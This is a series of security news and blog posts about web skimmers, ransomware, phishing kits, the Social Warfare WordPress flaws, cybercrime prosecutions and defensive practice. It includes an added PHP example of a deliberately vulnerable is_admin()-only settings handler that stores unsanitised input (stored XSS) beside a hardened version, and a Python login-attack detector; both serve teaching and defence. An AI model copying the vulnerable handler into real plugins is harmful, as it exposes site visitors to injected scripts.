Jérôme Segura, a security researcher at MalwareBytes, observed momo33333 during the process of setting up the skimmer script. The user initially started with a couple of tests, then published the final obfuscated skimmer payload, ready to be used in campaigns against Magento-based e-commerce stores.

“Just like with any other kind of third-party plugins, compromised Magento sites are loading this script within their source code, right after the CDATA script and/or right before the </html> tag: ” wrote Segura.

“It’s worth noting that the compromised Magento sites will remain at risk, even if the GitHub-hosted skimmer is taken down. Indeed, attackers can easily re-infect them in the same manner they initially injected the first one.”

Querying search engines such as PublicWWW, it is possible to determine that at least a couple of hundred websites were compromised using the Magecart skimmer script hosted on GitHub.

As usual, I suggest keeping your installation up to date by running the latest version of the CMS and its plugins.

“It is critical for e-commerce site owners to keep their CMS and its plugins up-to-date, as well as using secure authentication methods. Over the past year, we have identified thousands of sites that are hacked and posing a risk for online shoppers,” concludes the researcher.

Pierluigi Paganini

(SecurityAffairs – GitHub, Magecart skimmer scripts)

The post Magecart skimmer scripts hosted on GitHub infected 200+ e-commerce sites appeared first on Security Affairs.

Special-Purpose Vehicle Maker Aebi Schmidt Hit by Malware

The special-purpose vehicle maker Aebi Schmidt was hit by a malware attack that disrupted some of its operations.

The Aebi Schmidt Group is a manufacturer of product systems and services for the management, cleaning and clearance of traffic areas as well as for the maintenance of green areas in demanding terrain.

Aebi Schmidt focuses on manufacturing agricultural, municipal and other special-purpose vehicles, including snow blowers, street cleaners, and other machinery used in airports.

On Thursday Aebi Schmidt announced that its systems had been hit by a malware-based cyberattack. The incident caused the disruption of some of its operations, such as email management.

The malware only infected Windows systems; in response to the incident, the company temporarily switched off these systems.

“The IT system failure is due to an attempt by third parties to infiltrate malware into our systems. More and more companies worldwide are being affected by such attacks.” reads a note published by the company on its website.


The company notified customers and business partners of the incident and asked them to contact it via phone until its email systems are restored.

Fortunately, the cyber attack has not impacted production systems, order processing, US-based M-B Companies, or its telematics platform.

Windows systems are currently being “rebooted step by step,” but the process could be “time consuming.”

Aebi Schmidt did not share technical details of the cyber attack, but according to TechCrunch, the company was hit by ransomware.

“Aebi Schmidt, a European manufacturing giant with operations in the U.S., has been hit by a ransomware attack, TechCrunch has learned.” reads the post published by TechCrunch. “Schiess [spokesperson Thomas Schiess] would not comment on claims of ransomware specifically, but the source said staff were told during an all-hands meeting Wednesday that the incident was a “ransomware attack.””

Recently, another major European company was hit by ransomware: the aluminum giant Norsk Hydro suffered an extensive cyber attack that impacted operations in several of the company’s business areas across Europe and the U.S. The company estimated more than $40 million in losses in the first week following the ransomware attack that disrupted its operations.

Pierluigi Paganini

(SecurityAffairs – Aebi Schmidt, ransomware)

The post Special-Purpose Vehicle Maker Aebi Schmidt Hit by Malware appeared first on Security Affairs.

Crooks abuse GitHub platform to host phishing kits

Experts at Proofpoint discovered that free code repositories on GitHub have been abused since at least 2017 to host phishing websites.

Researchers at Proofpoint reported that crooks are abusing free code repositories on GitHub to host phishing websites and bypass security defenses. Experts discovered that cybercriminals are abusing the GitHub service since at least mid-2017.

The phishing websites were hosted on the canonical GitHub domain. Attackers are using stolen brand graphics to make their pages resemble the brand they are abusing.

“Since at least mid-2017, phishers have also been abusing free code repositories on the popular GitHub service to host phishing websites on the canonical  $ domain.” reads the post published by Proofpoint. “threat actors establish a canonical code repository site within the canonical domain that resembles the brand they are abusing.”

Inspecting the lookalike GitHub account used by the crooks reveals the files in the phishing kit; the experts noticed that the HTML code is lightly encoded in order to obfuscate the content.


The code sends credentials provided by the users in an HTTP POST request to another compromised site under the control of the attackers.

The phishing kits do not use typical hosted PHP methods because the platform does not provide PHP back-end services.

Experts observed that in some cases cybercriminals used the domain as a traffic redirector, with the intent of keeping the actual phishing page live a bit longer.

The drawback of using public GitHub accounts is that security researchers gain major visibility into the threat actors’ activity and into the changes to their phishing pages.

Proofpoint identified a particular user, “greecpaid,” who manages several phishing kits hosted on GitHub repositories.

Proofpoint reported its findings to GitHub that took down the accounts hosting phishing kits.

“In the past, threat actors have been able to evade detection by using well-known and trusted consumer cloud, social networking, and commerce services to host files as well as web hosts. Microsoft’s free accounts on the GitHub service, which have typically been used for Open Source and other public software development repositories, are equally vulnerable to widespread abuse,” Proofpoint concludes. 

Pierluigi Paganini

(SecurityAffairs – GitHub, cybercrime)

The post Crooks abuse GitHub platform to host phishing kits appeared first on Security Affairs.

Flaws in Social Warfare plugin actively exploited in the wild

Experts uncovered hacking campaigns exploiting two critical security vulnerabilities in the popular WordPress plugin Social Warfare.

Social Warfare is a popular WordPress plugin with more than 900,000 downloads; it lets site owners add social share buttons to a WordPress website.

Experts uncovered hacking campaigns exploiting two critical security vulnerabilities in the Social Warfare plugin to take control over WordPress websites using it.

At the end of March, experts found a Cross-Site Scripting (XSS) vulnerability in Social Warfare installations (v3.5.1 and v3.5.2) that is actively exploited to add malicious redirects.

The maintainers of Social Warfare for WordPress also addressed a remote code execution (RCE) vulnerability; both issues were tracked as CVE-2019-9978.

The issues in the WordPress plugin have been fixed with the release of version 3.5.3 of the plugin. On the same day, an unnamed security researcher published technical details of the flaw and a proof-of-concept exploit for the stored Cross-Site Scripting (XSS) vulnerability.

Experts pointed out that attackers can exploit the vulnerabilities to take complete control over websites and servers and use them for malicious purposes, such as mining cryptocurrency or delivering malware.

The availability of the exploit code led attackers to attempt exploiting the vulnerability, but they were only able to inject JavaScript code that redirects users to malicious sites.

Experts at Palo Alto Networks discovered several exploits for both vulnerabilities in the wild, including an exploit for the RCE one.

“We also caught several samples exploiting these vulnerabilities in the wild,” reads a blog post published by Palo Alto Networks Unit 42 researchers. “Figure 5 shows a POST request from one of the samples:”


The root cause of both flaws is the misuse of the is_admin() function in WordPress.

“The root cause of each of these two vulnerabilities is the same: the misuse of the is_admin() function in WordPress,” the researchers say in a blog post. “Is_admin only checks if the requested page is part of admin interface and won’t prevent any unauthorized visit.”
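An added illustration of this root cause (example code written for this page, not the plugin's own): a settings handler gated only on is_admin(), beside the same handler with a capability check, a nonce check, input sanitization and output escaping. All hook, option and request parameter names are hypothetical.

```php
<?php
/**
 * Added example, not code from the Social Warfare plugin: why gating a
 * handler on is_admin() is not an authorization check, and what to use.
 *
 * is_admin() answers only "is the requested URL part of the /wp-admin/
 * interface?". It says nothing about WHO sent the request: a request to
 * wp-admin/admin-ajax.php or admin-post.php from a logged-out visitor
 * still makes is_admin() return true. All hook names, option names and
 * request parameters below are hypothetical.
 */

// --- Vulnerable pattern (illustrative) -------------------------------------
// A "save settings" handler that runs on every admin request and trusts
// is_admin() as proof that an administrator is calling it.
add_action('admin_init', 'example_save_share_text_vulnerable');
function example_save_share_text_vulnerable() {
    if (!is_admin()) {
        return;
    }
    if (isset($_POST['example_share_text'])) {
        // No capability check, no nonce, no sanitization: whatever is sent
        // is stored and later echoed into pages (stored XSS).
        update_option('example_share_text', $_POST['example_share_text']);
    }
}

// --- Hardened pattern ------------------------------------------------------
// Register the handler on a dedicated admin-post action and check the three
// things is_admin() does not: capability, request origin (nonce), and input.
add_action('admin_post_example_save_share_text', 'example_save_share_text_hardened');
function example_save_share_text_hardened() {
    // 1. Capability: is the *current user* allowed to change plugin settings?
    if (!current_user_can('manage_options')) {
        wp_die(esc_html__('You are not allowed to do this.', 'example'), '', array('response' => 403));
    }
    // 2. Origin: was the request issued from our own settings form?
    //    check_admin_referer() stops the request if the nonce is missing or invalid.
    check_admin_referer('example_save_share_text');
    // 3. Input: sanitize before storing.
    $text = sanitize_text_field(wp_unslash($_POST['example_share_text'] ?? ''));
    update_option('example_share_text', $text);

    wp_safe_redirect(admin_url('options-general.php?page=example&updated=1'));
    exit;
}

// The settings form that targets the hardened handler and carries the nonce.
function example_render_settings_form() {
    ?>
    <form method="post" action="<?php echo esc_url(admin_url('admin-post.php')); ?>">
        <input type="hidden" name="action" value="example_save_share_text">
        <?php wp_nonce_field('example_save_share_text'); ?>
        <input type="text" name="example_share_text"
               value="<?php echo esc_attr(get_option('example_share_text', '')); ?>">
        <?php submit_button(__('Save', 'example')); ?>
    </form>
    <?php
}

// 4. Output: escape when rendering the stored value on the public site.
function example_render_share_text() {
    echo esc_html(get_option('example_share_text', ''));
}
```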

Experts found about 40,000 sites that are using the Social Warfare plugin, most of which are running a vulnerable version.

Vulnerable websites belong to many industries, such as education, finance, and news; the experts highlighted that many of these sites receive high traffic.

“There are many exploits in the wild for the Social Warfare plugin and it is likely they will continue to be used maliciously. Since over 75 million websites are using WordPress and many of the high traffic WordPress websites are using the Social Warfare plugin, the users of those websites could be exposed to malware, phishing pages or miners.” concludes Palo Alto Networks. “Website administrators should update the Social Warfare plugin to 3.5.3 or newer version.”

Pierluigi Paganini

(SecurityAffairs – WordPress, Social Warfare plugin)

The post Flaws in Social Warfare plugin actively exploited in the wild appeared first on Security Affairs.

Security Affairs newsletter Round 210 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.


Once again thank you!

Attackers hacked support agent to access Microsoft Outlook email accounts
Major coordinated disinformation campaign hit the Lithuanian Defense
Romanian duo convicted of fraud Scheme infecting 400,000 computers
Security Affairs newsletter Round 209 – News of the week
Whatsapp, Instagram, Facebook down worldwide
A new DDoS technique abuses HTML5 Hyperlink Audit Ping in massive attacks
Apache fixed an important RCE flaw in Tomcat application server
Gnosticplayers round 5 – 65 Million+ fresh accounts from 6 security breaches available for sale
Gnosticplayers round 5 – 65 Million+ fresh accounts from 8 security breaches available for sale
Locked Shields 2019 – Chapeau, France wins Cyber Defence Exercise
Yellow Pencil WordPress Plugin flaw expose tens of thousands of sites
Adblock Plus filter can be exploited to execute arbitrary code in web pages
Blue Cross of Idaho data breach, 5,600 customers affected
CVE-2019-0803 Windows flaw exploited to deliver PowerShell Backdoor
Ecuador suffered 40 Million Cyber attacks after the Julian Assange arrest
FireEye releases FLASHMINGO tool to analyze Adobe Flash files
Scranos – A Cross Platform, Rootkit-Enabled Spyware rapidly spreading
A new variant of HawkEye stealer emerges in the threat landscape
Code execution – Evernote
eGobbler hackers used Chrome bug to deliver 500Million+ ads to iOS users
European Commission is not in possession of evidence of issues with Kaspersky products
Justdial is leaking personal details of all customers real-time
RCE flaw in Electronic Arts Origin client exposes gamers to hack
Analyzing OilRigs malware that uses DNS Tunneling
APT28 and Upcoming Elections: evidence of possible interference (Part II)
Cisco addresses a critical bug in ASR 9000 series Routers
Drupal patched security vulnerabilities in Symfony, jQuery
Facebook ‘unintentionally collected contacts from 1.5 Million email accounts without permission
Russian TA505 threat actor target financial entities worldwide
Broadcom WiFi Driver bugs expose devices to hack
Facebook admitted to have stored millions of Instagram users passwords in plaintext
Operator of Codeshop Cybercrime Marketplace Sentenced to 90 months in prison
Ransomware attack knocks Weather Channel off the Air
Source code of tools used by OilRig APT leaked on Telegram
Avast, Avira, Sophos and other antivirus solutions show problems after
Google is going to block logins from embedded browsers against MitM phishing attacks
Hacker broke into super secure French Governments Messaging App Tchap hours after release
Marcus Hutchins pleads guilty to two counts of banking malware creation

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 210 – News of the week appeared first on Security Affairs.

Marcus Hutchins pleads guilty to two counts of banking malware creation

British malware researcher Marcus Hutchins has pleaded guilty to developing and sharing the banking malware between July 2014 and July 2015.

The popular British cybersecurity expert Marcus Hutchins has pleaded guilty to developing and sharing the Kronos banking malware between July 2014 and July 2015.

Marcus Hutchins, also known as MalwareTech, made the headlines after discovering the “kill switch” that halted the outbreak of the WannaCry ransomware. In August 2017, he was arrested in Las Vegas after attending the Def Con hacking conference and was detained by the FBI in the state of Nevada.

In August 2017, Marcus Hutchins pleaded not guilty to charges of creating and selling malware at a hearing in Milwaukee, Wisconsin.
The court decided to relax the expert's bail terms, allowing him to access the Internet and continue his ordinary working activities. The only restriction on Hutchins was that he could not visit the WannaCry server domain.

The decision was unusual because computer crime suspects are typically not allowed to stay online.

The court allowed him to live in Los Angeles, where the company that hired him is located, but he was obliged to surrender his passport and he must wear a tracking device until his trial in October.

On Friday, Hutchins accepted a plea deal and admitted two charges of malware development.

“I’ve pleaded guilty to two charges related to writing malware in the years prior to my career in security,” reads a statement published by the expert.

“I regret these actions and accept full responsibility for my mistakes. Having grown up, I’ve since been using the same skills that I misused several years ago for constructive purposes. I will continue to devote my time to keeping people safe from malware attacks.”

Marcus Hutchins faces a maximum penalty of five years in prison, a $250,000 fine, and a year of probation.

According to federal law enforcement, the researcher told an unnamed associate over a recorded telephone line: “I used to write malware, they picked me up on some old shit,” and “I wrote code for a guy a while back who then incorporated it into a banking malware.”

Pierluigi Paganini

(Security Affairs – Marcus Hutchins, cybercrime)

The post Marcus Hutchins pleads guilty to two counts of banking malware creation appeared first on Security Affairs.

Operator of Codeshop Cybercrime Marketplace Sentenced to 90 months in prison

Djevair Ametovski was sentenced to 90 months in prison for operating an international cybercrime marketplace named Codeshop.

Macedonian national Djevair Ametovski (32) was sentenced to 90 months in prison by US authorities for operating an international cybercrime marketplace named Codeshop, a website that specialized in selling stolen payment card data. Ametovski acquired payment card data from hackers who had stolen it from financial institutions and individuals.

According to the investigators, the man commercialized data of 181,000 payment cards between 2010 and 2014.


Ametovski (known online as Codeshop, Sindromx, xhevo, and Sindrom) was arrested by Slovenian authorities in January 2014; at the time, he was charged with aggravated identity theft, access device fraud conspiracy, and wire fraud conspiracy. The Macedonian citizen was extradited to the United States in May 2016.

The man pleaded guilty to access device fraud and aggravated identity theft; he was also ordered to forfeit $250,000 and to pay restitution in an amount to be determined later.

Codeshop customers were able to buy stolen card data by searching for specific types of data based on criteria such as country, bank, and bank identification number.

“The stolen data could then be used to make online purchases and to encode plastic cards to withdraw cash at ATMs.” reads the press release of the Justice Department.

“Ametovski used a network of online money exchangers and anonymous digital currencies, including Bitcoin, to reap revenues from the Codeshop website and to conceal all participants’ identities, including his own. Over the course of the scheme, Ametovski obtained and sold stolen credit and debit card data for more than 1.3 million cards,” said the Justice Department.

Pierluigi Paganini

(SecurityAffairs – Codeshop, carding)

The post Operator of Codeshop Cybercrime Marketplace Sentenced to 90 months in prison appeared first on Security Affairs.

Russian TA505 threat actor target financial entities worldwide

Russian financially motivated threat actor TA505 used remote access Trojans (RATs) in attacks on financial entities in the United States and worldwide.

Security experts at CyberInt uncovered a new campaign of a Russian financially motivated threat actor tracked as TA505. The hackers used remote access Trojans (RATs) in attacks aimed at financial entities in the United States and worldwide.

“CyberInt researchers have been tracking various activities following the spear-phishing campaign targeting large US-based retailers detected in December 2018.” reads the analysis published by Cyberint. “The research focused on scenarios with the same tactics, techniques and procedures (TTP) along with the repeated nefarious use of a ‘legitimate’ remote administration tool ‘Remote Manipulator System’ (RMS), developed by a Russian-based company ‘TektonIT’.”

The TA505 group was first spotted by Proofpoint back in 2017; it has been active since at least 2015 and targets organizations in the financial and retail industries.

The group carried out a large number of campaigns using weaponized Office and PDF documents to deliver notorious malware, including the Dridex banking trojan, the tRat RAT, the FlawedAmmyy RAT, Philadelphia ransomware, GlobeImposter, and Locky ransomware.

Tracked by the research community as TA505, the Russian threat group is known for the use of banking Trojans such as Shifu and Dridex, as well as for the massive Locky ransomware campaigns observed several years ago.

In recent attacks the experts observed the group using new backdoors, including the modular tRat and ServHelper.

In campaigns carried out between December 2018 and February 2019, the TA505 group leveraged the Remote Manipulator System (RMS) backdoor to target financial institutions in Chile, India, Italy, Malawi, Pakistan and South Korea, and retailers in the United States.

In December 2018, the group also targeted large US retailers and organizations in the food and beverage industry with spear-phishing attacks. The phishing messages used a weaponized Word document containing a Visual Basic for Applications (VBA) macro. The macro downloads a payload from the command and control (C&C) server; the last stage of the attack chain is the RMS RAT.

The investigation conducted by the researchers allowed them to uncover other campaigns conducted between December 2018 and March 2019.

Hackers hit targets in many countries worldwide, including Chile, India, Italy, Malawi, Pakistan and South Korea. Researchers believe that other attacks against targets in China, Great Britain, France and the United States could be attributed to the same threat actor.

The weaponized documents used in the attacks leverage Microsoft Windows Installer to fetch a payload from the C2 and execute it.

“This behaviour is consistent with other TA505 campaigns utilising a combination of weaponised Microsoft Office files containing either VBA macros or exploit code to spawn additional processes.” continues the analysis published by Cyberint. “Of the spreadsheet lures analysed in this campaign, four different C2 servers and payloads were identified, with each likely being unique to a specific target organization or victim cluster.”

Experts also observed the attackers using the ServHelper RAT since November 2018; it allows them to set up reverse SSH tunnels for remote access to the compromised machine via RDP.


The report states that the indicators of compromise identified in the campaign against US retailers are consistent with an attack against the Notary Chamber of Ukraine conducted by the same threat actor in December 2018.

At the time, the threat actor was delivering the RMS Trojan in spear-phishing attacks.

Further technical details on the attacks are included in the report published by Cyberint.

Pierluigi Paganini

(SecurityAffairs – hacking, VSDC)

The post Russian TA505 threat actor target financial entities worldwide appeared first on Security Affairs.

e-Crime & Cybersecurity Congress: Cloud Security Fundamentals

I was a panellist at the e-Crime & Cybersecurity Congress last week; the discussion was titled 'What's happening to your business? Cloud security, new business metrics and future risks and priorities for 2019 and beyond'. Here is a recap of the points I made.

Cloud is the 'Default Model' for Business

Cloud is now the default model for IT services in the UK; cloud ticks all the efficiency boxes that successful businesses continually crave. Indeed, the 'economies of scale' benefits are not just more cost-effective and more agile IT services, but also better cybersecurity (by the major cloud service providers), even for the largest of enterprises. It is not the CISO's role to challenge the business' cloud service migration, which is typically part of a wider digital transformation strategy, but to ensure cloud services are delivered and managed to legal, regulatory and client security requirements, and in satisfaction of the board's risk appetite, given that the board ultimately owns the cybersecurity risk, which is an operational business risk.

There are security pitfalls with cloud services, the marketing gloss of 'the cloud' should not distract security professionals into assuming IT security will be delivered as per the shiny sales brochure, as after all, cloud service providers should be considered and assessed in the same way as any other traditional third-party IT supplier to the business.

Cloud Security should not be an afterthought

It is essential for security to be baked into a new cloud services design, requirements determination, and in the procurement process. In particular, defining and documenting the areas of security responsibility with the intended cloud service provider.

Cloud does not absolve the business of their security responsibilities

All cloud service models, whether the standard models of Infrastructure as a Service (IaaS), Platform as a Service (PaaS) or Software as a Service (SaaS), always involve three areas of security responsibilities to define and document:
  • Cloud Service Provider Owned
  • Business Owned
  • Shared (Cloud Service Provider & Business)
For example, with a PaaS model the business is fully responsible for deploying applications onto the cloud platform, and therefore for the security of those applications. The cloud service provider is responsible for the security of the physical infrastructure, network and operating system layers. An example of a 'shared' responsibility in this model is the process for provisioning and managing privileged operating system accounts within the cloud environment.

Regardless of the cloud model, data is always the responsibility of the business.

A 'Trust but Verify' approach should be taken with cloud service providers when assuring the security controls they are responsible for. Where security responsibilities are owned by or shared with the cloud service provider, ensure the specific controls and processes are detailed within the contract or a supporting agreement as service deliverables, then oversee those controls and processes through regular assessments.

Games people play: testing cybersecurity plans with table-top exercises

If a picture is worth a thousand words, and video is worth many multiples more, what value is an interactive experience that plants you firmly in the hot seat during a major security incident? Reading about cyberattacks or data breaches is useful, but it can’t replicate the visceral feeling of a table-top exercise. Variously called war-gaming scenarios or simulated attacks, they can be a valuable way of helping boards and senior managers understand the full implications of cyber threats. More importantly, they can shed light on gaps where the business can improve its incident response procedure.

These exercises are designed to be immersive. They might start with a scenario like a board meeting, or a company orientation day. All participants will get a role to play; for the purpose of the session, they might be designated as a head of HR, finance, legal, or IT. As the scenario starts to unfold, a message arrives. The press has been enquiring about a major data breach or a ransomware attack on the company.

Muscles tighten, a wave of nausea passes over the stomach. The fight-or-flight instinct starts to take hold. Your role might say manager, but you don’t feel like you’re in control.

What happens next?

That will depend on how much preparation your business has done for a possible cybersecurity threat. Some companies won’t have anything approaching a plan, so the reaction looks and feels like panic stations. At various points during this exercise, the facilitator might introduce new alerts or information for the group to react to. For example, that could be negative commentary on social media, or a fall in the company stock price.

The exercise should prompt plenty of questions for the participants. What exactly is going on? How do we find out what’s happened? How is this affecting operations? Who’s taking charge? What do we tell staff, or the public, or the media?

A growing sense of helplessness can be a powerful spur to make rapid changes to the current cybersecurity incident response plan (assuming there is one).

Other organisations may already have a series of steps for what to do in the event of an incident or breach. In these cases, the table-top exercise is about testing the viability of those plans. You can be prepared, but do the steps on paper work in practice? Or as Mike Tyson memorably put it, “everybody has a plan until they get punched in the mouth”.

The exercise can show the value of having a playbook that documents all procedures to carry out: “if X happens, then do Y”. This will also shed light on missing steps, such as contact numbers for key company executives, an external security consultant, regulators, law enforcement, or media.

Fail to prepare, prepare to fail

When it comes to developing or refining an incident response plan, the devil is in the detail, says David Prendergast, senior cybersecurity consultant at BH Consulting. Here are some useful questions to ask:

  • If your policy says: ‘contact the regulator’, ask which one(s)
  • Who is the specific point of contact at the regulators office?
  • Does the organisation have the email address or phone numbers for that person?
  • Who in your company or agency is authorised to talk to the regulator?
  • What information are they likely to need to have that conversation?
  • Do you have pre-prepared scripts or statements for when things might go wrong (for customers, stakeholders, staff, and media, including social media channels)?

It might also force the company into making certain decisions about resources. Are there enough internal staff to carry out an investigation? Is that the most appropriate use for those employees, or is it better to focus their efforts on recovering IT systems?

That’s the value in table-top exercises: they afford the time to practice when it’s calm and you can absorb the lessons. There are plenty of examples of companies that handled similar situations spectacularly badly in full public view. (We won’t name names, but the list includes anyone who uttered the words “sophisticated attack” before an investigation even started.)

By the (play)book

It’s more helpful to learn from positive examples of companies that showed leadership in the face of a serious incident. That can be as simple as a statement of business priorities while an organisation copes with the fallout. In 2017, as Maersk reeled from a ransomware infection, CEO Soren Skou gave frontline staff in 130 countries clear instructions. As the Financial Times reported, the message was unequivocal even as the company was forced into shutting down IT systems. “Do what you think is right to serve the customer – don’t wait for the HQ, we’ll accept the cost.”

Some larger companies will run an exercise just for themselves, but some organisations run joint war-gaming scenarios with industry peers. Earlier this month, financial institutions and trade associations from around Europe carried out a simulated ransomware attack.

According to FinExtra, the scenario took the form of an on-site technical and hands-on-keyboard experience. There were 14 participants at CISO and CIO level, along with many more observers from other companies in the financial sector. The aim of the event was to encourage collaboration and information sharing with other teams and organisations to improve collective defences against cyber threats.

Whether it’s a war-gaming exercise or a table-top event, the goal is the same: to be ready for the worst ahead of time, and knowing what steps are available to you when bad things happen for real.

The post Games people play: testing cybersecurity plans with table-top exercises appeared first on BH Consulting.

The Business of Organised Cybercrime

Guest article by David Warburton, Senior Threat Research Evangelist, F5 Networks

Team leader, network administrator, data miner, money specialist. These are just some of the roles making a difference in today’s enterprises. The same is also true for sophisticated cybergangs.

Many still wrongly believe that the dark web is exclusively inhabited by hoodie-clad teenagers and legions of disaffected disruptors. The truth is, the average hacker is just a cog in a complex ecosystem more akin to a corporate enterprise than you might think. The only difference is the endgame, which is usually to cause reputational or financial damage to governments, businesses and consumers.

There is no way around it: cybercrime is now run like an industry, with multiple levels of deceit shielding those at the very top from capture. It is therefore more important than ever for businesses to re-evaluate their perceptions of cybercriminals and ensure effective protective measures are in place.

Current perceptions surrounding Cybergangs

Cybergangs as a collective are often structured like legitimate businesses, including partner networks, resellers and vendors. Some have even set up call centres to field interactions with ransomware victims. Meanwhile, entry-level hackers across the world are embarking on career development journeys of sorts, enjoying opportunities to learn and develop skills. 

This includes the ability to write their own tools or enhance the capabilities of others. In many ways, it is a similar path to that of an intern. They often become part of sophisticated groups or operations once their abilities reach a certain level. Indeed, a large proportion of hackers are relatively new entrants to the cybercrime game and still use low-level tools to wreak havoc. This breed of cybercriminal isn’t always widely feared by big corporations. They should be.

How Cybergangs are using Technology to Work Smarter and Cheaper

Cybergangs often work remotely across widely dispersed geographies, which makes them tricky to detect and deal with. The nature of these structures also means that cyber attacks are becoming more automated, rapid and cost-effective. The costs and risks are further reduced when factoring in the fluidity and inherent anonymity of cryptocurrencies and the dark web.

The industry has become so robust that hackers can even source work on each link in an attack chain at an affordable rate. Each link is anonymous to the other threat actors in the chain, vastly reducing the risk of detection.

IoT Vulnerabilities on the Rise
According to IHS Markit, there will be 125 billion IoT devices on the planet by 2030.  With so much hype surrounding the idea of constant and pervasive connectivity, individuals and businesses are often complacent when it comes to ensuring all devices are secure. 

Significantly, it is easier to compromise an IoT device that is exposed to the public Internet and protected with known vendor default credentials than it is to trick an individual into clicking on a link in a phishing email.

Consequently, it is crucial for organisations to have an IoT strategy in place that encompasses the monitoring and identification of traffic patterns for all connected devices. Visibility is essential to understand network behaviour and any potential suspicious activities that may occur on it.

Why Cybersecurity Mindsets must Change

IT teams globally have been lecturing staff for years on the importance of creating different passwords. Overall, the message is not resonating enough.

To combat the issue, businesses need to consider alternative tactics such as password manager applications, as well as ensuring continuous security training is available and compulsory for all staff.

It is worth noting that the most commonly attacked credentials are the vendor defaults for some of the most commonly used applications in enterprise environments. Simply having a basic system hardening policy that ensures vendor default credentials are disabled or changed before the system goes live will prevent this common issue from becoming a painful breach. System hardening is a requirement in every best practice security framework or compliance requirement.

Ultimately, someone with responsibility for compliance, audit, or security should be continually reviewing access to all systems. Commonly, security teams will only focus on systems within the scope of some compliance or regulatory obligation. This can lead to failure to review seemingly innocuous systems that can occasionally result in major breaches.

In addition to continual access reviews, monitoring should be in place to detect access attacks. Brute force attacks can not only lead to a breach, they can also result in performance impacts on the targeted system or lock customers out of their accounts. As a result, there are significant financial incentives for organisations to equip themselves with appropriate monitoring procedures.
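
The monitoring the article calls for can be prototyped from ordinary authentication logs. What follows is an added example written for this page, not code from the article or from F5: it parses OpenSSH-style auth.log lines (the sample lines, hostnames and addresses are constructed, not real traffic) and raises alerts on two access-attack shapes, a brute-force burst against a single account and a credential-stuffing run across many accounts from one source, plus any later successful login from a source that was already flagged. The 60-second window and the two thresholds are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines in OpenSSH auth.log format (not real traffic).
# 203.0.113.10 hammers one account (brute force); 198.51.100.7 tries many
# accounts once each and finally gets in (credential stuffing);
# 192.0.2.25 is a legitimate user who mistyped a password once.
SAMPLE_LOG = """\
Jan 28 10:00:01 web1 sshd[4111]: Failed password for admin from 203.0.113.10 port 50211 ssh2
Jan 28 10:00:02 web1 sshd[4112]: Failed password for admin from 203.0.113.10 port 50212 ssh2
Jan 28 10:00:03 web1 sshd[4113]: Failed password for admin from 203.0.113.10 port 50213 ssh2
Jan 28 10:00:04 web1 sshd[4114]: Failed password for admin from 203.0.113.10 port 50214 ssh2
Jan 28 10:00:05 web1 sshd[4115]: Failed password for admin from 203.0.113.10 port 50215 ssh2
Jan 28 10:00:06 web1 sshd[4116]: Failed password for admin from 203.0.113.10 port 50216 ssh2
Jan 28 10:00:10 web1 sshd[4120]: Failed password for alice from 198.51.100.7 port 40001 ssh2
Jan 28 10:00:11 web1 sshd[4121]: Failed password for bob from 198.51.100.7 port 40002 ssh2
Jan 28 10:00:12 web1 sshd[4122]: Failed password for carol from 198.51.100.7 port 40003 ssh2
Jan 28 10:00:13 web1 sshd[4123]: Failed password for dave from 198.51.100.7 port 40004 ssh2
Jan 28 10:00:14 web1 sshd[4124]: Failed password for invalid user erin from 198.51.100.7 port 40005 ssh2
Jan 28 10:00:15 web1 sshd[4125]: Accepted password for frank from 198.51.100.7 port 40006 ssh2
Jan 28 10:05:00 web1 sshd[4130]: Failed password for alice from 192.0.2.25 port 51000 ssh2
Jan 28 10:05:30 web1 sshd[4131]: Accepted password for alice from 192.0.2.25 port 51001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2}\s\d{2}:\d{2}:\d{2})\s\S+\ssshd\[\d+\]:\s"
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port"
)


def parse_auth_log(text):
    """Return (timestamp, success, user, ip) tuples sorted by time."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated sshd lines are ignored
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # syslog lines carry no year
        events.append((ts, m["result"] == "Accepted", m["user"], m["ip"]))
    events.sort(key=lambda e: e[0])
    return events


def detect_access_attacks(events, window_s=60, bf_threshold=5, spray_threshold=4):
    """Flag per-source failure bursts, then any later success from a flagged source.

    brute_force:         >= bf_threshold failures for ONE user within the window
    credential_stuffing: failures for >= spray_threshold DIFFERENT users within the window
    """
    failures = defaultdict(list)
    for ts, ok, user, ip in events:
        if not ok:
            failures[ip].append((ts, user))

    alerts = []
    for ip, fails in failures.items():
        for i, (t0, _) in enumerate(fails):  # slide a window starting at each failure
            window = [(t, u) for t, u in fails[i:] if (t - t0).total_seconds() <= window_s]
            per_user = defaultdict(int)
            for _, u in window:
                per_user[u] += 1
            hammered = [u for u, n in per_user.items() if n >= bf_threshold]
            if hammered:
                alerts.append(("brute_force", ip, hammered[0]))
                break
            if len(per_user) >= spray_threshold:
                alerts.append(("credential_stuffing", ip, sorted(per_user)))
                break

    flagged = {ip for _, ip, _ in alerts}
    for ts, ok, user, ip in events:
        if ok and ip in flagged:  # the login that matters: an attacker who got through
            alerts.append(("success_after_attack", ip, user))
    return alerts


if __name__ == "__main__":
    for kind, ip, detail in detect_access_attacks(parse_auth_log(SAMPLE_LOG)):
        print(f"{kind:22} {ip:15} {detail}")
```

The third alert type is the one worth paging on: a burst of failures is noise until a success follows it from the same source, at which point the account in question should be treated as compromised rather than merely targeted.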

Cybergangs use many different methods to wreak havoc, making it increasingly difficult to identify attacks in a timely manner. Businesses are often ignorant about the size of attacks, the scope of what has been affected, and the scale of the operation behind them. You are operating in the dark without doing the utmost to know your enemy. Failing to do so will continue to put information, staff and customers at risk by allowing cybergangs to operate in the shadows.
David Warburton is Senior Threat Research Evangelist with F5 Labs, with over 20 years' experience in IT and security.

Cyber Security Roundup for January 2019

The first month of 2019 was a relatively slow month for cyber security in comparison with the steady stream of cyber attacks and breaches throughout 2018. On Saturday 26th January, car servicing and repair outfit Kwik Fit told customers its IT systems had been taken offline due to malware, which disrupted its ability to book in car repairs. Kwik Fit didn't provide any details about the malware, but it is fair to speculate that the outbreak was more likely caused by a general lack of security patching and anti-virus protection than by anything sophisticated.

